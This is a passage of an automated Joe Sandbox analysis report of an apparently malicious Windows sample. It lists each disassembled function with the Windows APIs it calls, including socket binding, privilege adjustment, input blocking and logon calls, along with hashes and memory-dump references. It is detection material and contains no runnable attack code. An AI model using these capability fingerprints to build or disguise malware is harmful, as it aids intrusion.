                                              • Instruction ID: 28bc24fd5d5613f2fa495453a34339f56a8cf2045597201717be0351b2935516
                                              • Opcode Fuzzy Hash: 68a707358aeb311fba7573e09d74d05a0c194ba4d30dc2404e50e266ba321a66
                                              • Instruction Fuzzy Hash: BEA13570115414BBEA28AB6D8C89EBF39EDDF47301F3409EAF442DA191CF299D41C276
                                              Function 00B9C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00B9C329
                                              • _wcscmp.LIBCMT ref: 00B9C359
                                              • _wcscmp.LIBCMT ref: 00B9C36E
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B9C37F
                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B9C3AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                              • String ID:
                                              • API String ID: 2387731787-0
                                              • Opcode ID: a2949e9f7cd1cc8fca908dc4ee2abbdcd238462bc7ca2aaa88aeccbddb0d6d15
                                              • Instruction ID: 10505ab769be315b896ecee0b3800f4601b12895dcfbab895c3eeeac47ec2d06
                                              • Opcode Fuzzy Hash: a2949e9f7cd1cc8fca908dc4ee2abbdcd238462bc7ca2aaa88aeccbddb0d6d15
                                              • Instruction Fuzzy Hash: CC517C75A046029FCB14DF68D490EAABBE8EF49314F1046ADF956CB3A1DB30AD04CB91
                                              Function 00BA6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BA84A0
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BA6E89
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6EB2
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00BA6EEB
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6EF8
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00BA6F0C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: 5b3833cb4c6ed63eb0a6b23e5fb3dddb95630492c0377eb2e964ec4d1686f93e
                                              • Instruction ID: ca3f4a3f41e97a37cb78d0de7233c5bcce6eb7843d3df334768396453575b4fe
                                              • Opcode Fuzzy Hash: 5b3833cb4c6ed63eb0a6b23e5fb3dddb95630492c0377eb2e964ec4d1686f93e
                                              • Instruction Fuzzy Hash: 4941D175600200AFDB10BF64DC86F6EB3E8DB09714F148498FA45AB3D2DB70AD008BA1
                                              Function 00BB59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 0fcb4536a2c2eda9db05ddb0da0fc8ee9271c520451d41595bc8d3610ad46218
                                              • Instruction ID: f5358a56b8457e28f8965d1e4fe0837fefea7028f93b7c7d7332ff8935083824
                                              • Opcode Fuzzy Hash: 0fcb4536a2c2eda9db05ddb0da0fc8ee9271c520451d41595bc8d3610ad46218
                                              • Instruction Fuzzy Hash: 3511B6723009119FE7216F669C84B7A77D9EF48720F144169E846E7241CFB0ED018AA1
                                              Function 00B70030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LocalTime__swprintf
                                              • String ID: %.3d$WIN_XPe
                                              • API String ID: 2070861257-2409531811
                                              • Opcode ID: 3f6ba72f6a558c7e34226cbd6ab4bc2eb0e7b2622f389ff19db9a2610703b14a
                                              • Instruction ID: 663b3dd9d022c8e6e8242698e02a8aa2cfcd5263eb241b0ce99aade2de3d6cc8
                                              • Opcode Fuzzy Hash: 3f6ba72f6a558c7e34226cbd6ab4bc2eb0e7b2622f389ff19db9a2610703b14a
                                              • Instruction Fuzzy Hash: 00D01D7186810DDAC715A650CCC4DF973FCA704314F1480D3F519A2050D7354748A711
                                              Function 00BA29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00BA2AAD
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BA2AE4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: 14bbdb478c83fed6d7074d8c69bb537917a0b06536e839bd7aed9b4f58c5d8d3
                                              • Instruction ID: 2c406e29e06ca8461edc108c251b719177762471b7d12197f23fef13eeb7b868
                                              • Opcode Fuzzy Hash: 14bbdb478c83fed6d7074d8c69bb537917a0b06536e839bd7aed9b4f58c5d8d3
                                              • Instruction Fuzzy Hash: F241B371608609BFEB20DF98CC81FBBB7FCEB41764F1040AAF605A7241EA719E459660
                                              Function 00B89399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B50FE6: std::exception::exception.LIBCMT ref: 00B5101C
                                                • Part of subcall function 00B50FE6: __CxxThrowException@8.LIBCMT ref: 00B51031
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B893E3
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B89410
                                              • GetLastError.KERNEL32 ref: 00B8941D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: af817a7bd35be07379dcf866e7e66b50e75f87d1d59554001509318dead2dcf9
                                              • Instruction ID: 5971184d5dde79599980c750adbf55f6f25694d7979f5b58faf2e1caf806e610
                                              • Opcode Fuzzy Hash: af817a7bd35be07379dcf866e7e66b50e75f87d1d59554001509318dead2dcf9
                                              • Instruction Fuzzy Hash: 8A11BFB1414209AFE728EF54DC85E3BB7FCEB48711B2485AEE44983250EB30AC41CB64
                                              Function 00B942D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B942FF
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00B9433C
                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B94345
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: ee8df08099cbb14d89d47185b61120d3a8c58f07ac18ef94b46afac5038743d1
                                              • Instruction ID: ca15ca247aed3e37d4767d40393c89532fe40eba9a1c800c8676f08b66c732a3
                                              • Opcode Fuzzy Hash: ee8df08099cbb14d89d47185b61120d3a8c58f07ac18ef94b46afac5038743d1
                                              • Instruction Fuzzy Hash: E91182B1914229BEEB109BE89C44FAFBBBCEB09710F040166B914E7190C7745D0187A5
                                              Function 00B94F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B94F45
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B94F5C
                                              • FreeSid.ADVAPI32(?), ref: 00B94F6C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: c65b6de7cee8a9f3027619bf2455e794cc796d8634708c4fe5d4951554e47412
                                              • Instruction ID: c578b7fb0cfc4ae0928c56ea4364f7f057c62c5a079b1a798097b4b86e57ed45
                                              • Opcode Fuzzy Hash: c65b6de7cee8a9f3027619bf2455e794cc796d8634708c4fe5d4951554e47412
                                              • Instruction Fuzzy Hash: 64F03775A1120DFFDF04DFE09C89EAEBBB8EB08201F0044A9A901E2180E7346A048B50
                                              Function 00B91AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B91B01
                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B91B14
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InputSendkeybd_event
                                              • String ID:
                                              • API String ID: 3536248340-0
                                              • Opcode ID: 39dfffd02830b4b67ebf27931c25d4be31a61065727b99aeb5a0fa0fbe974b24
                                              • Instruction ID: fbd33441bdfcf9e0d47538ed9a39b1f5be8194cee9b51d4596ad3218af84c47d
                                              • Opcode Fuzzy Hash: 39dfffd02830b4b67ebf27931c25d4be31a61065727b99aeb5a0fa0fbe974b24
                                              • Instruction Fuzzy Hash: 7DF0A93190020DEBDB00DF94C845BFE7BB8FF18301F00804AF95996292D3398611DF94
                                              Function 00B9A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00BA9B52,?,00BC098C,?), ref: 00B9A6DA
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00BA9B52,?,00BC098C,?), ref: 00B9A6EC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: f12b2b08605eb612057bc0f1c698e5f708c826454b4b87e3f320fb8b8f71e852
                                              • Instruction ID: 4444eedbd363837c97f35f24aaad73aa88fd013080c6de0617aa1b4018d09b3b
                                              • Opcode Fuzzy Hash: f12b2b08605eb612057bc0f1c698e5f708c826454b4b87e3f320fb8b8f71e852
                                              • Instruction Fuzzy Hash: 92F0893551421DBBDB20AFA4CC48FDA77ACEF09351F044195B518D7141DA309550CBE1
                                              Function 00B88DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B88F27), ref: 00B88DFE
                                              • CloseHandle.KERNEL32(?,?,00B88F27), ref: 00B88E10
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: fb4c30170642f92904073be829cf19450623c2b3a563e4b935bae6bad63b8c63
                                              • Instruction ID: 87db22f53eaa4e89269761a843c2e370e7ad2d9e780a270a0873980f68f0bc5b
                                              • Opcode Fuzzy Hash: fb4c30170642f92904073be829cf19450623c2b3a563e4b935bae6bad63b8c63
                                              • Instruction Fuzzy Hash: 61E04F31010600EFE7212B14EC08E7377EDEB043217158C59F895804B0CB215C90DB10
                                              Function 00B5A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B58F87,?,?,?,00000001), ref: 00B5A38A
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B5A393
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: c86a002b86ccc52b5a48307b55a77f51775da6adfb55bb60abe442094dddd70f
                                              • Instruction ID: 41676a6739b611880e576813d5dcffaa0ac24fb671c9c78a2c6af25ecd27d5ad
                                              • Opcode Fuzzy Hash: c86a002b86ccc52b5a48307b55a77f51775da6adfb55bb60abe442094dddd70f
                                              • Instruction Fuzzy Hash: C8B09231074248EBCA403B91EC09F883F68EBCCA62F004010FA1D46060CF6254508A99
                                              Function 00BA45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00BA45F0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: 74b763f028d302366ba5f820c97abbdb7ae0a86575934f6187eb168d08b56f4e
                                              • Instruction ID: e9b22f1658f3fe9577c7b067e8751c757eb56bca224b07111d8ce8048754f9eb
                                              • Opcode Fuzzy Hash: 74b763f028d302366ba5f820c97abbdb7ae0a86575934f6187eb168d08b56f4e
                                              • Instruction Fuzzy Hash: B9E09A312102099FC310AF5AE800A8AB7E8AFA8760F008066FC09C7310DBB0AC008B90
                                              Function 00B951E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B95205
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              • Opcode ID: 6b235a41609c77da06a8831ebd378bbbc842cb11471217f12ccca7fe2fe334a6
                                              • Instruction ID: 56cac5cae50da14068d07cd23823cd39a056ad025e4bd19db1f6b918c7525246
                                              • Opcode Fuzzy Hash: 6b235a41609c77da06a8831ebd378bbbc842cb11471217f12ccca7fe2fe334a6
                                              • Instruction Fuzzy Hash: 5ED05E941E0E2979EC3A03248E0FF361688E3007C0FA441E97802A50C1ECD05C819631
                                              Function 00B89369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B88FA7), ref: 00B89389
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              • Opcode ID: 949d073fff8357624b352bf444bc092619457c3b12066e4e851dc239e30bb290
                                              • Instruction ID: f4be40055b1b9b6b99afc8ccd4e4cfecc9fadeb8e19d10c4bba74c479cc47f0b
                                              • Opcode Fuzzy Hash: 949d073fff8357624b352bf444bc092619457c3b12066e4e851dc239e30bb290
                                              • Instruction Fuzzy Hash: C8D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE15D61A1C775D935AB60
                                              Function 00B70722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00B70734
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: c36cf567e33594d10ac4f985748d3e5ee222aca585014907acaf8fcae085a327
                                              • Instruction ID: d3d9a4cfe985ccaf34552f6d4082874c33870f4c60f9abc572bbdac2ba11c2ea
                                              • Opcode Fuzzy Hash: c36cf567e33594d10ac4f985748d3e5ee222aca585014907acaf8fcae085a327
                                              • Instruction Fuzzy Hash: 26C04CF182010DDBCB05EBA0D988EEE77BCAB08314F114056E115B2100D7749B448A71
                                              Function 00B5A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B5A35A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: cad0b2d8dcdb4262a5f3d5d340b70e9ea20a0a3780229ffa391d8445f4a9af5e
                                              • Instruction ID: 7558be1ec7cf513b214eac6b0c786684e788cbf9b314127dd19399f2775f157d
                                              • Opcode Fuzzy Hash: cad0b2d8dcdb4262a5f3d5d340b70e9ea20a0a3780229ffa391d8445f4a9af5e
